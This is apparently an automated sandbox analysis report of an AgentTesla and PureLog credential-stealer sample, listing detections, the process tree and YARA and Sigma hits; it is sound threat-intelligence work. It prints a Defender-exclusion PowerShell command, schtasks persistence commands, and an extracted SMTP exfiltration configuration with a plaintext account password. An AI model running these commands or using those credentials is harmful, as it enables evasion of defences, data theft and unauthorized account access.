Edit tour

Windows Analysis Report
SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe

Overview

General Information

Sample name:	SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe
Analysis ID:	1398430
MD5:	6e7df9fae35366f13f6d83e037321608
SHA1:	1a3231720688f17ad0ed86c633ff02a9777b5753
SHA256:	232dda5f15f635e041afce6e34f17ba284380475a14232e85856065bdd78f0be
Tags:	AgentTeslaexe
Infos:

Detection

AgentTesla, PureLog Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: MSBuild connects to smtp port

Sigma detected: Scheduled temp file as task from temp location

Snort IDS alert for network traffic

Yara detected AgentTesla

Yara detected AntiVM3

Yara detected PureLog Stealer

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

Contains functionality to log keystrokes (.Net Source)

Installs a global keyboard hook

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Silenttrinity Stager Msbuild Activity

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected Generic Downloader

Abnormal high CPU Usage

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality to call native functions

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Tries to load missing DLLs

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe (PID: 6552 cmdline: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe MD5: 6E7DF9FAE35366F13F6D83E037321608)

powershell.exe (PID: 984 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4996 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7408 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6812 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp919E.tmp MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 6580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7236 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 7256 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

MSBuild.exe (PID: 7264 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

jYRIGnZlROed.exe (PID: 7360 cmdline: C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe MD5: 6E7DF9FAE35366F13F6D83E037321608)

schtasks.exe (PID: 7584 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\jYRIGnZlROed" /XML "C:\Users\user\AppData\Local\Temp\tmp9C4C.tmp MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

MSBuild.exe (PID: 7644 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Agent Tesla, AgentTesla	A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.	SWEED	http://blog.nsfocus.net/sweed-611/ http://l1v1ngc0d3.wordpress.com/2021/11/12/agenttesla-dropped-via-nsis-installer/ http://ropgadget.com/posts/originlogger.html http://www.secureworks.com/research/threat-profiles/gold-galleon https://asec.ahnlab.com/ko/29133/	https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "SMTP", "Port": "587", "Host": "mail.elec-qatar.com", "Username": "mohammed.abrar@elec-qatar.com", "Password": "MHabrar2019@#"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1674653824.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1662329813.00000000032CF000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.1678075288.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000008.00000002.1678075288.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000009.00000002.1695168637.00000000031BE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.1695168637.000000000317B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0000000D.00000002.4073894024.0000000002EE4000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1667293685.0000000007D80000.00000004.08000000.00040000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000008.00000002.1678075288.0000000002C1C000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.4073894024.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000D.00000002.4073894024.0000000002EB1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000D.00000002.4073894024.0000000002EDC000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1662329813.0000000002EEB000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1662329813.0000000002F32000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000000.00000002.1662329813.0000000003308000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000009.00000002.1697688935.000000000438B000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.1663132505.0000000004922000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe PID: 6552	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe PID: 6552	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe PID: 6552	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: MSBuild.exe PID: 7264	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 7264	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: jYRIGnZlROed.exe PID: 7360	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: jYRIGnZlROed.exe PID: 7360	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: jYRIGnZlROed.exe PID: 7360	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: MSBuild.exe PID: 7644	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MSBuild.exe PID: 7644	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 25 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32ea6c4.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f2275c.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.jYRIGnZlROed.exe.31ae900.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.7d80000.15.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31845:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x318b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31941:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x319d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31a3d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31aaf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31b45:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31bd5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.jYRIGnZlROed.exe.31ae900.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32e96ac.5.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.jYRIGnZlROed.exe.31be918.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.32ec6dc.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.2f32774.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.jYRIGnZlROed.exe.31be918.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.MSBuild.exe.400000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.MSBuild.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
8.2.MSBuild.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33645:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x336b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33741:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x337d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3383d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x338af:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33945:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x339d5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.jYRIGnZlROed.exe.45cda10.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33645:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x336b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33741:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x337d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3383d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x338af:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33945:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x339d5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.jYRIGnZlROed.exe.4592df0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33645:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6e265:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x336b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6e2d7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33741:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6e361:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x337d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6e3f3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3383d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6e45d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x338af:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6e4cf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33945:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6e565:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x339d5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x6e5f5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
9.2.jYRIGnZlROed.exe.45cda10.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.jYRIGnZlROed.exe.45cda10.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.jYRIGnZlROed.exe.45cda10.4.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31845:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x318b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31941:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x319d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31a3d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31aaf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31b45:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31bd5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.3308724.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
9.2.jYRIGnZlROed.exe.4592df0.3.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
9.2.jYRIGnZlROed.exe.4592df0.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
9.2.jYRIGnZlROed.exe.4592df0.3.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x31845:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x318b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x31941:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x319d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x31a3d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x31aaf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x31b45:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x31bd5:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4b29d10.11.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x12caa5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1676c5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x1a20e5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x12cb17:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x167737:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x1a2157:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x12cba1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1677c1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x1a21e1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x12cc33:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x167853:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x1a2273:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x12cc9d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x1678bd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x1a22dd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x12cd0f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x16792f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x1a234f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x12cda5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x1679c5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x1a23e5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4ba6330.10.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0xb0485:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xeb0a5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x125ac5:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xb04f7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xeb117:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x125b37:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xb0581:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xeb1a1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x125bc1:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xb0613:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xeb233:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x125c53:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xb067d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xeb29d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x125cbd:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xb06ef:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xeb30f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x125d2f:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xb0785:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xeb3a5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x125dc5:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe.4c23170.12.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x33645:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x6e265:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xa8c85:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x336b7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x6e2d7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xa8cf7:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x33741:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x6e361:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xa8d81:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x337d3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x6e3f3:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xa8e13:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3383d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x6e45d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xa8e7d:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x338af:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x6e4cf:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xa8eef:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x33945:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x6e565:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xa8f85:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Click to see the 41 entries

Sigma Signatures

Networking

Sigma detected: MSBuild connects to smtp port

Source: Network Connection

Author: Joe Security: Data: DestinationIp: 50.87.139.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7264, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49735

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentImage: C:\Users\user\Desktop\SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ParentProcessId: 6552, ParentProcessName: SecuriteInfo.com.Variant.Lazy.463632.16595.14067.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\jYRIGnZlROed.exe, ProcessId: 984, ProcessName: powershell.exe

Sigma detected: Silenttrinity Stager Msbuild Activity

Source: Network Connection

Author: Kiran kumar s, oscd.community: Data: DestinationIp: 104.26.13.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 7264, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49734

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

